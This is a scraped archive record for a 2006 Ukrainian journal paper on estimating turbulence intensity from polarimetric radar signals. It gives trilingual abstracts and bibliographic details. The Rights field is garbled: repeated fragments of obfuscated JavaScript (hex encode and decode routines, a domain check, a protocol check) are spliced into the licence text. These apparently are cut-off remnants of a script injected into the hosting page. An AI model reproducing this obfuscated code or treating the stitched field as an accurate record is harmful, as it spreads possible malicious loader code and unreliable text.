Record Details

THE POSSIBILITY TO USE POLARIMETRIC RADAR FOR ATMOSPHERIC TURBULENCE INTENSITY ESTIMATE

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title THE POSSIBILITY TO USE POLARIMETRIC RADAR FOR ATMOSPHERIC TURBULENCE INTENSITY ESTIMATE
Возможность использования поляриметрического радиолокатора для оценки атмосферной турбулентности
Можливість використання поляриметричного радіолокатора для оцінки атмосферної турбулентності
 
Creator Averyanova, Yuliya
 
Subject


 
Description  Approach, that is presented in this paper proposes to estimate the turbulence intensity by spectral components of polarization signals as random process. It allows to decrease time for signal processing. We consider turbulence as stochastic process. Liquid hydrometeors that are the cause of polarization spectrum appearance are considered as the filter from which the output signal is taken for further transmitting and processing. The requirements to the line for polarization spectrum transmission are represented. The calculations show that the transmission line should be capable to transmit frequencies from about zero to those that are determined by the sampling frequency that is enough to define polarization spectrum parameters as a random process with given accuracy. 
 Изложен подход, позволяющий оценить интенсивность турбулентности за спектральными оценками поляризационного сигнала как случайного процесса и уменьшить время обработки сигнала. Турбулентность рассмотрен как случайный процесс, жидкие гидрометеоры, вызывающих появление спектра поляризации - как фильтр, с которого снимается сигнал для дальнейшей обработки и передачи. Обоснованы требования к тракту передачи спектра поляризационного сигнала. Показано, что тракт должен быть способен передавать диапазон частот от значений, близких к нулю, до частот, определяемых частотой дискретизации, что является достаточным для определения с заданной точностью параметров поляризационного спектра как случайного процесса.
 Викладено підхід, що дозволяє оцінити інтенсивність турбулентності за спектральними оцінками поляризаційного сигналу як випадкового процесу та зменшити час обробки сигналу. Турбулентність розглянуто як випадковий процес, рідкі гідрометеори, що викликають появу спектра поляризації – як фільтр, з якого знімається сигнал для подальшої обробки та передачі. Обґрунтовано вимоги до тракту передачі спектра поляризаційного сигналу. Показано, що тракт має бути спроможним передавати діапазон частот від значень, що є близькими до нуля, до частот, що визначаються частотою дискретизації, що є достатньою для визначення з заданою точністю параметрів поляризаційного спектра як випадкового процесу.
 
Publisher National Aviation University
 
Contributor


 
Date 2006-03-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1339
10.18372/2306-1472.29.1339
 
Source Proceedings of the National Aviation University; Том 29, № 3 (2006); 46-48
Вестник Национального авиационного университета; Том 29, № 3 (2006); 46-48
Вісник Національного Авіаційного Університету; Том 29, № 3 (2006); 46-48
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ